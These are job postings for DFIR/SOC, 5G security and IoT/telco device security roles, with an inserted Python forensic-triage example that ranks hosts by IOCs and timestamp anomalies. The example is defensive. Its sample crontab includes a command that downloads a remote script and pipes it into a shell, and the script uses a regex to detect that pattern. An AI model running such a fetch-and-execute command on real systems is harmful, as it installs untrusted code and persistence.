DFIR/SOC Analyst

Expertise in Forensic Log Collection on Linux Machines
· Proficient in acquiring system-level artifacts from Linux environments for digital forensic analysis.
· Use of artifact collectors and forensic tooling such as UAC (Unix-like Artifacts Collector), Log2Timeline/Plaso, Volatility, FTK, EnCase and Eric Zimmerman's tools.

Development of Customized Scripts
· Tailoring the default UAC profile to fit specific incident response or investigation use cases, including collection of application logs.
· Performance tuning to minimize system impact during live data acquisition.
· Custom scripts for parsing and pattern-based detection (Python, Bash, etc.).

Strong Understanding of Telecom Components
· Familiarity with core telecom infrastructure such as:
• Signaling systems (SS7, SIP, Diameter)
• Network elements (MME, PGW, SGW, SPF, AMF, UPF, MSC, HLR, VLR, UDC, etc.) and the protocols between them (SIGTRAN, GTP)

Bulk Analysis of Collected Artifacts
· Triaging and prioritizing systems based on severity and the presence of confirmed IOCs or TTPs.
· Investigating a large number of systems in bulk using artifacts collected from Linux systems.
· Leveraging automation and scripting (e.g., Python, Bash, YARA rules) to efficiently parse and analyze forensic data.
· Identifying Indicators of Compromise (IOCs), suspicious behavior patterns and anomalies, including lateral movement, privilege escalation and anomalous process execution.
· Persistence mechanisms (e.g., rootkits, startup script modifications, backdoored binaries).
· Checking timestamps for tampering or time skewing, which indicates anti-forensic behavior.
· Correlation of events across systems and timeframes to establish timelines and root causes.
· Identification of unauthorized access, unauthorized configuration changes, malicious binaries, persistence, data exfiltration, etc.
· Support in post-incident activities such as RCA sessions or tabletop exercises.
· Validation of password reset activities.

Documentation and Reporting
· Compilation of forensic findings into a structured and comprehensive report, including:
• Executive summary
• Technical findings with evidence
• Timeline of events
• Mapping of detections to MITRE ATT&CK TTPs
• Recommendations for remediation and mitigation
• Detection use-case recommendations based on the observed TTPs
· Maintenance of internal documentation to support audit trails and reproducibility of analysis.

Interpersonal Skills
· Ability to communicate complex technical findings effectively to both technical and non-technical audiences.
· Strong analytical and problem-solving skills, with attention to detail and accuracy.
· Self-driven and able to work effectively in high-stress situations, handling multiple incidents simultaneously.
· Demonstrated ability to work both independently and collaboratively within a team.
· Flexible in shifts.
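The bulk-analysis workflow the posting describes (parse artifacts collected from many Linux hosts, match IOCs, check timestamps for tampering, rank hosts and build a cross-host timeline) is shown below as an added worked example. It is not code from the posting or from UAC. The host names, IOC values, log lines, bodyfile entries and scoring weights are all constructed for illustration; the bodyfile layout is the TSK 3.x format (md5|path|inode|mode|uid|gid|size|atime|mtime|ctime|crtime) that collectors such as UAC emit.

```python
"""Bulk triage of Linux artifacts collected from several hosts (added example).

Parses constructed, UAC-style per-host bundles, matches IOCs, flags timestamp
anomalies and system binaries changed outside package management, ranks hosts
and builds one timeline across all of them. All data below is constructed.
"""
import re
from datetime import datetime, timezone


def ts(iso_str):
    """ISO-8601 UTC string -> epoch seconds."""
    return int(datetime.fromisoformat(iso_str).replace(tzinfo=timezone.utc).timestamp())


def iso(epoch):
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")


# Constructed IOC set (hypothetical values, not real intelligence).
IOCS = {"ip": {"203.0.113.7"}, "path": {"/tmp/.x/kworker"},
        "md5": {"9f86d081884c7d659a2feaa0c55ad015"}}
# Assumed weights: one confirmed IOC outranks any single heuristic or anomaly.
WEIGHTS = {"ioc": 10, "anomaly": 3, "heuristic": 2}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/")


def body(md5, path, mtime, ctime):
    """Build one TSK bodyfile line (atime set equal to mtime for brevity)."""
    return f"{md5}|{path}|1203|-rwxr-xr-x|0|0|4096|{mtime}|{mtime}|{ctime}|0"


HOSTS = {  # constructed per-host bundles, as a collector would leave them on disk
    "mme01": {
        "collected_at": ts("2024-03-10T12:00:00"),
        "auth.log": [
            "Mar 10 09:14:58 mme01 sshd[2210]: Failed password for invalid user oracle from 203.0.113.7 port 51210 ssh2",
            "Mar 10 09:15:02 mme01 sshd[2210]: Accepted password for root from 203.0.113.7 port 51234 ssh2"],
        "crontab": ["*/5 * * * * /tmp/.x/kworker >/dev/null 2>&1"],
        "dpkg.log": ["2024-02-20 03:11:45 status installed openssl:amd64 3.0.2-0ubuntu1.14"],
        "bodyfile": [
            body("9f86d081884c7d659a2feaa0c55ad015", "/tmp/.x/kworker", ts("2024-03-10T09:17:00"), ts("2024-03-10T09:17:00")),
            # /usr/bin/ps back-dated to 2019, but its ctime is after the last dpkg run
            body("3c59dc048e8850243be8079a5c74d079", "/usr/bin/ps", ts("2019-01-01T00:00:00"), ts("2024-03-10T09:20:00"))]},
    "sgw02": {
        "collected_at": ts("2024-03-10T12:05:00"),
        "auth.log": ["Mar 10 08:02:11 sgw02 sshd[900]: Accepted publickey for ops from 10.20.0.5 port 40012 ssh2"],
        "crontab": ["@reboot curl -s http://198.51.100.9/a.sh | sh"],
        "dpkg.log": ["2024-03-01 02:00:10 status installed curl:amd64 7.81.0-1ubuntu1.15"],
        # mtime later than ctime cannot result from normal writes or utimes(): tampering or clock skew
        "bodyfile": [body("b6d767d2f8ed5d21a44b0e5886680cb9", "/dev/shm/.t", ts("2024-03-11T00:00:00"), ts("2024-03-10T08:03:00"))]},
    "upf03": {
        "collected_at": ts("2024-03-10T12:10:00"),
        "auth.log": ["Mar 10 07:30:00 upf03 sshd[1201]: Accepted publickey for ops from 10.20.0.5 port 40100 ssh2"],
        "crontab": ["0 3 * * * /usr/local/bin/rotate-pcaps.sh"],
        "dpkg.log": ["2024-03-01 02:00:10 status installed curl:amd64 7.81.0-1ubuntu1.15"],
        "bodyfile": [body("c4ca4238a0b923820dcc509a6f75849b", "/usr/local/bin/rotate-pcaps.sh", ts("2024-01-15T10:00:00"), ts("2024-01-15T10:00:00"))]},
}

AUTH_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Accepted|Failed) (\w+) for (?:invalid user )?(\S+) from (\S+)")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")  # constructed heuristic


def parse_auth(lines, year):
    """Syslog auth lines carry no year; borrow it from the collection time."""
    events = []
    for line in lines:
        m = AUTH_RE.match(line)
        if not m:
            continue
        stamp = re.sub(r"\s+", " ", m.group(1))
        when = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S").replace(tzinfo=timezone.utc)
        events.append({"ts": int(when.timestamp()), "result": m.group(2), "user": m.group(4), "ip": m.group(5)})
    return events


def parse_bodyfile(lines):
    out = []
    for line in lines:
        md5, path, _ino, _mode, _uid, _gid, _size, _atime, mtime, ctime, _crtime = line.split("|")
        out.append({"md5": md5, "path": path, "mtime": int(mtime), "ctime": int(ctime)})
    return out


def last_pkg_activity(dpkg_lines):
    """dpkg.log lines start with 'YYYY-MM-DD HH:MM:SS'; return the latest."""
    return max((ts(l[:19].replace(" ", "T")) for l in dpkg_lines), default=0)


def triage_host(name, bundle):
    """Return score, findings and timeline events for one host."""
    findings, events = [], []
    year = datetime.fromtimestamp(bundle["collected_at"], tz=timezone.utc).year
    for ev in parse_auth(bundle["auth.log"], year):
        events.append((ev["ts"], name, f"sshd {ev['result']} {ev['user']} from {ev['ip']}"))
        if ev["ip"] in IOCS["ip"]:
            findings.append(("ioc", f"ssh {ev['result'].lower()} login from IOC ip {ev['ip']}"))
    for entry in bundle["crontab"]:
        if any(p in entry for p in IOCS["path"]):
            findings.append(("ioc", f"crontab references IOC path: {entry}"))
        elif PIPE_TO_SHELL.search(entry):
            findings.append(("heuristic", f"crontab pipes a download into a shell: {entry}"))
    pkg_ts = last_pkg_activity(bundle["dpkg.log"])
    for f in parse_bodyfile(bundle["bodyfile"]):
        events.append((f["ctime"], name, f"inode change {f['path']}"))
        if f["path"] in IOCS["path"]:
            findings.append(("ioc", f"IOC path present: {f['path']}"))
        if f["md5"] in IOCS["md5"]:
            findings.append(("ioc", f"IOC hash present: {f['path']} {f['md5']}"))
        # mtime > ctime or any stamp after collection time: timestomping or clock skew
        if f["mtime"] > f["ctime"] or max(f["mtime"], f["ctime"]) > bundle["collected_at"]:
            findings.append(("anomaly", f"timestamp tampering/skew on {f['path']} (mtime {iso(f['mtime'])}, ctime {iso(f['ctime'])})"))
        # package-managed binary whose inode changed after the last package-manager run
        if f["path"].startswith(SYSTEM_DIRS) and f["ctime"] > pkg_ts:
            findings.append(("anomaly", f"{f['path']} changed after last package activity {iso(pkg_ts)}"))
    return {"score": sum(WEIGHTS[k] for k, _ in findings), "findings": findings, "events": events}


def triage(hosts):
    """Rank hosts by score and merge their events into one sorted timeline."""
    results = {name: triage_host(name, b) for name, b in hosts.items()}
    ranked = sorted(results, key=lambda n: results[n]["score"], reverse=True)
    timeline = sorted(ev for r in results.values() for ev in r["events"])
    return ranked, results, timeline


if __name__ == "__main__":
    ranked, results, timeline = triage(HOSTS)
    for name in ranked:
        print(f"{name}: score {results[name]['score']}")
        for kind, detail in results[name]["findings"]:
            print(f"  [{kind}] {detail}")
    print("timeline:")
    for t, host, what in timeline:
        print(f"  {iso(t)} {host} {what}")
```

The two timestamp rules are deliberately conservative: a file whose mtime lies after its ctime cannot be produced by ordinary writes or by utimes() (both set ctime to the current clock), and a package-managed binary whose ctime postdates the last dpkg run was touched outside the package manager even if its mtime was back-dated. Neither rule catches a back-dated mtime on an unmanaged path; that still needs the package database or a known-good hash set.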
Role Summary: The 5G Security Specialist will focus on securing 5G infrastructure by ensuring robust architectural designs, developing security controls, and monitoring for 5G-specific threats. The role also involves addressing the unique security challenges posed by 5G technologies.

Job Description:
· Design, implementation, and maintenance of security solutions for 5G networks.
· Designing a secure 5G network architecture that ensures the integrity of 5G infrastructure, including the RAN (Radio Access Network), Core Network, and Transport Network.
· Conducting risk assessments and vulnerability analyses for 5G infrastructure.
· Monitoring and responding to security incidents in real time in 5G networks.
· Developing and enforcing security policies, standards, and procedures for 5G networks.
· Collaborating with cross-functional teams to ensure secure deployment of 5G technologies.
· Staying updated on the latest 5G security threats, trends, and mitigation strategies.
· Providing training and guidance to internal teams on 5G security best practices.
· Working with vendors and partners to ensure compliance with security standards.
· Preparing detailed reports and documentation on security assessments and incidents.
· Implementation of 5G security features such as encryption and authentication protocols at the subscriber, application, and network layers.
· Implementation of security controls for network slicing, including secure isolation between slices serving different services and robust access control between 5G components.
· Deployment of 5G-specific intrusion detection/prevention systems (IDS/IPS) to monitor and detect threats in the 5G network, such as DDoS attacks, man-in-the-middle (MITM) attacks, and vulnerabilities in the RAN.
· Security assessments of 5G core elements to identify vulnerabilities on the N2 (gNB to AMF control plane), N3 (gNB to UPF user plane) and N6 (UPF to data network) interfaces, using penetration testing tools and custom scripts and following GSMA and 3GPP industry standards.
· Development of 5G-specific incident response plans, including automated network quarantine and isolation procedures for compromised devices or services in the 5G network.
· Conducting 5G vulnerability assessments and producing risk mitigation plans.
Apply if willing to relocate to KSA.

Devices & Telco Security (DTS) Team

DTS Tower Lead / Consultant
Purpose: Lead IoT and telco device security programs.
Responsibilities:
· Oversee security of network devices, base stations and IoT endpoints.
· Ensure compliance with telecom security standards (3GPP, GSMA).
Skills: Telco networks, IoT security, OT security.
Experience: 8–10 years.
Must Have: IoT/OT/telco infrastructure security, 10+ years of experience, strategy and leadership.
Good To Have: 5G and edge security knowledge, telecom compliance.
Tools: Palo Alto IoT, Forescout, Fortinet OT Security, Zscaler IoT.
Comments: Owns the device and telco infrastructure security framework.

IoT / Devices Security Specialist
Purpose: Implement and monitor device security controls.
Responsibilities:
· Harden IoT and telco devices.
· Monitor endpoint security events.
Skills: IoT protocols, MDM and EMM solutions.
Experience: 3–5 years.
Must Have: IoT protocols (MQTT, CoAP), endpoint device hardening.
Good To Have: OT security, industrial control system exposure.
Tools: Forescout, Trend Micro IoT Security, Fortinet.
Comments: Focus on IoT endpoint and device protection.

Senior IoT / Devices Security Specialist
Purpose: Advanced threat detection and remediation for devices.
Responsibilities:
· Investigate device-specific attacks.
· Implement firmware integrity checks.
Skills: Embedded security, secure boot, threat modeling.
Experience: 5–7 years.
Must Have: 5+ years of IoT/OT security, network segmentation, forensic experience.
Good To Have: 5G security, MDM/EMM integration.
Tools: Microsoft Intune, Forescout, Palo Alto IoT.
Comments: Leads IoT/OT threat hunting and advanced configuration.

IoT / Devices Security Consultant
Purpose: Advise on IoT/telco device security strategy.
Responsibilities:
· Conduct device security assessments.
· Recommend architecture improvements.
Skills: IoT security frameworks, supply chain risk assessment.
Experience: 8+ years.
Must Have: Consulting and risk assessments for IoT/OT environments.
Good To Have: Industry verticals (energy, healthcare, telco).
Tools: OT/IoT assessment tools, Fortinet OT, Tenable.ot.
Comments: Advisory-oriented role bridging business with technology.
As a 5G Security Specialist, your primary focus will be on ensuring the security of 5G infrastructure through robust architectural designs, security control development, and monitoring for 5G-specific threats. You will be tasked with addressing the unique security challenges that arise from 5G technologies.

Your responsibilities will include designing, implementing, and maintaining security solutions tailored for 5G networks. This will involve creating a secure network architecture that guarantees the integrity of 5G infrastructure components such as the RAN, Core Network, and Transport Network. You will conduct risk assessments and vulnerability analyses specific to 5G infrastructure, as well as monitor and respond to security incidents in real time within 5G networks.

Collaboration with cross-functional teams will be essential to ensure the secure deployment of 5G technologies. Staying informed about the latest 5G security threats, trends, and mitigation strategies will also be crucial. Additionally, you will provide training and guidance to internal teams on best practices for 5G security. Working closely with vendors and partners, you will ensure compliance with security standards and prepare detailed reports and documentation on security assessments and incidents.

Implementation of encryption and authentication protocols at various network layers, security controls for network slicing, and intrusion detection/prevention systems for 5G-specific threats such as DDoS and MITM attacks will be part of your responsibilities. Conducting security assessments on 5G core elements, developing incident response plans, and performing vulnerability assessments and risk mitigation plans are also key aspects of this role. Your expertise will be crucial in maintaining the security and integrity of 5G networks in the face of evolving security threats and challenges.